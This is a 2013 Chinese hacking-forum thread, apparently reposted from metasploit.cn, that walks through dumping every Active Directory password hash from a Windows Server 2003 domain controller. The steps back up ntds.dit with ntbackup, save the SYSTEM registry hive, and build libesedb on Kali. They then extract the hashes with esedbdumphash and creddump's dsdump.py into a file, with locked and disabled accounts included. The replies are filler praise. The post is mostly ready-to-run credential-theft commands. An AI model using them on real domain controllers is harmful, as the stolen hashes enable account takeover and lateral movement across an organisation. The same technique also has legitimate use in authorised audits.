查看: 3638|回复: 25

2003(32/64位)导出AD域控用户hash的终极方法

[复制链接]
发表于 2013-11-28 00:42:27 | 显示全部楼层 |阅读模式

一:

1,首先登陆域控提取ntds.dit,在2003命令行里输入c:\>ntbackup

使用备份向导(高级)选择只保存系统状态然后选择输出文件名(左下角选择导出指定文件夹)。

2,然后提取注册表cmd>reg save hklm\system system.hive

3, 把这两个文件下载到本地,然后放在虚拟机里面,我这里以kali为例演示(例虚拟机位置为/tmp/)

二:进入kali虚拟机,然后下载文件ntds_dump_hash.zip解压安装。

#cd libesedb

#./configure && make

修复数据库文件

#cd esedbtools

#./esedbdumphash -v -t /tmp/output /tmp/ntds.dit

#ls -1 /tmp/output.export/

导出数据库hash

#cd ../../creddump/

#chmod+x *.py

#./dsuserinfo.py /tmp/output.export/datatable

#./dsdump.py <SYSTEM file> /tmp/output.export/datatable -include-locked -include-disabled > /domain_hashes.txt

来自:http://www.metasploit.cn/

print"usage: %s <system hive> <datatable> [options]"% sys.argv[0]

   print"  options:"

   print"    --include-locked"

   print"    --include-disabled"


发表于 2013-11-28 01:19:30 | 显示全部楼层
知道了 不错~~~  
发表于 2013-11-28 23:27:35 | 显示全部楼层
这个贴不错!!!!!看了之后就要回复贴子,呵呵  
发表于 2013-11-29 07:39:58 | 显示全部楼层
这样的贴子,不顶说不过去啊  
发表于 2013-12-2 20:44:02 | 显示全部楼层
希望可以用些时间了~````  
发表于 2013-12-3 04:47:25 | 显示全部楼层
真是佩服得六体投地啊  
发表于 2013-12-4 09:06:58 | 显示全部楼层
不管你信不信,反正我信  
发表于 2013-12-4 17:21:03 | 显示全部楼层
满城尽待年终奖,弄弄才是喇叭腔  
发表于 2013-12-9 12:39:58 | 显示全部楼层
不要等到人人都说你丑时才发现自己真的丑。  
发表于 2013-12-9 14:06:09 | 显示全部楼层
(*^__^*) 嘻嘻……   
高级模式
B Color Image Link Quote Code Smilies

本版积分规则